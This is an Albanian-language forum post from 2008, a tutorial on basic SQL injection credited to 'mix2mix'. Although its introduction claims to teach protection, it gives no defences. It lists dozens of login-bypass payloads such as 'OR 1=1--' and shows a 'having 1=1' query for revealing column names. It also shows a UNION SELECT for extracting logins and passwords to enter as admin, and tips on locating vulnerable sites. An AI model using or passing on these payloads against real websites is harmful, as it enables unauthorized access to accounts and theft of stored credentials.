[^DANZEL^]
FlashcRew
Regjistruar: 04/06/2007
Vendbanimi: AL
Mesazhe: 24
|
Sql injection bazat
Tutorial: Sql injection bazat
Author: mix2mix
-----------------------------------
1° Intro
2° sql injection ?
3° Shembull sql inj 01
4° Emrat e te gjithave kampeve te pranishme
5° Si ti marrim informacionet
6° Si ta kerrkoj nje sql inj ?
__________________________________________________
_______________________
1) Intro
Te nderuar antar, tani ketu do tju tregoj se si te mbrohemi nga sql injection...
para te gjithave do tju tregojm se cka eshte nje sql injection..
ateher do te kalojm ne disa shembuj baze..
Buona lettura..
2) sql injection ?
Tani do tua jap nje spjegim shpejt e shpejt per sql injection...Ateher..
Per sql injection themi se eshte nje kalim i kodit sql qe nuk eshte i parapam
pej atij qe ka krijuar scriptin para atyj...
Zakonisht sql injection eshte e lejuashme prej grabimeve te kodeve...
qe mundesojn ekzekutimin e kodeve sql..
( sql injection e ashtu quajtura | injecioni i sql | )
3) Shembull Baze
Ateher si keni mire kuptuar qe sql injectio eshte armiku i php, asp, etj...
tani dote filloj te tregoj disa shembuj bazik..
Tani imagjinoni dy kampe (combo box)ku duhet futur username & password ne qoft
se scripti eshte jo i sigurt secili nga antaret mund te fus cfaredo
instukcioni sql.. do te shkruajm thjesht [ ' ] ose me mire apostrofin..
shikoni 2 shembuj te thiesht..
e para eshte ajo normale..( $sql )
SELECT * FROM user WHERE username= 'phpBB' AND password= 'shembull'
Gjersa kjo eshte ajo e " modifikuar "
SELECT * FROM user WHERE username= 'phpBB' OR 1=1--' AND password= 'shembull'
do te thot se pa asnje problem..
do te kyci (logohi). ne faqen e mbrojtur..
ose do te hyni si admin...
=> kjo natyrisht nvaret prej scriptit
Shifni disa sql inj bazike te perdorura:
**************************************************
******************************************
Username: Admin
Passw: ' or ''='
' or '1'='1
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 'x'='x
' or 'x'='x
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
**************************************************
******************************************
4) Emri i gjitha kampeve prezent
Shikoni tani do tju tregoj se si ti kthejm
te gjith emrat e kampeve prezent...
Duhet te perdorim nje query si kjo ketu me poshte:
shembull:
SELECT * FROM Tabela_Juaj where USERID='' having 1=1
Se do te leshohet
do te shifni se serveri do tua kthej emrat e te gjithve
kampeve prezente ne tabel...
5) Si ti marrim informacionet
Ateher nje her mbas gjetjes se gjitha kampeve query
eshte leht te gjejm informacione te nevojshme :-D
shembull:
SELECT idutenti, login, Password from antari where login='
' union select 1,1,'cfare do vlere' from antari
kjo gjeneron nje gabim..
do te thot se jua kthen vleren kampeve login...
E njejta gje eshte edhe per password...
ne menyr qe mund te hyni si antari i zegjedhur nga ju..
si gjithmon eshte admini :-D
6) Si te gjejm nje sql inj ?
Shikoni !!
sikam shkruar me lart, si ta gjej nje sql inj ??
hmmm egzistojn menyra te ndryshme..
por me se pakti duhet te dim disa funkcione nga database MySQL
e natyrisht se cilin script doni te gjeni sql inj tuaj...
do te thot php, asp, etj..
Teknika me e shfrytezuar apo e perdor eshte te kontrollom kodin & e funkcionet e saj..
do te thot se eshte mire ta shkarkojm nje board ose nje guestbook..
te kapaciteteve te ulta
te ngarkoni ne ftp tuaj private
e te beni te gjitha provat e nevojshme..
Ose gjithashtu egzistojn software qe bejn gjithshka automatikisht, ose me mire
ju tregojn webin e bug-uar nga sql injection..
njeri nder me te miret ne cirkulim eshte "Acunetix Web Vulnerability Scanner "
edhe pse simbas mejet eshte me mire se te bejm ne gjithcka vecmas
sepse perndryshe nuk do te mesoni kurr gje...
e programi do te bej gjithcka vetem pa ju treguar arsyen dhe shkakun...
aeher ju rekomandoj te kuptoni mire para se te reagoni & ateher ndoshta
ta shfrytezoni kur keni pak kohe ose
kur do te keni nje njohur te avancuar ne kete kamp...
Denonco këtë mesazh tek moderatorët | IP: e regjistruar
|
25 Dhjetor 2008 14:48![[^DANZEL^] nuk po viziton aktualisht forumin](images/off.gif)
![Kliko këtu për Profilin Personal të [^DANZEL^]](images/profile.gif)
![Kliko këtu për të kontaktuar me [^DANZEL^] (me Mesazh Privat)](images/sendpm.gif)
![Vizito faqen personale të [^DANZEL^]'t!](images/home.gif)
![Kërko mesazhe të tjera nga: [^DANZEL^]](images/find.gif)
![Shto [^DANZEL^] në listën e injorimit](images/ignore.gif)
![Shto [^DANZEL^] në listën e monitorimit](images/buddy.gif)
Lord_Of_The_Strings
Forumi Horizont > Shkenca > Informatikë & Programim > Tutorial > Sql injection bazat
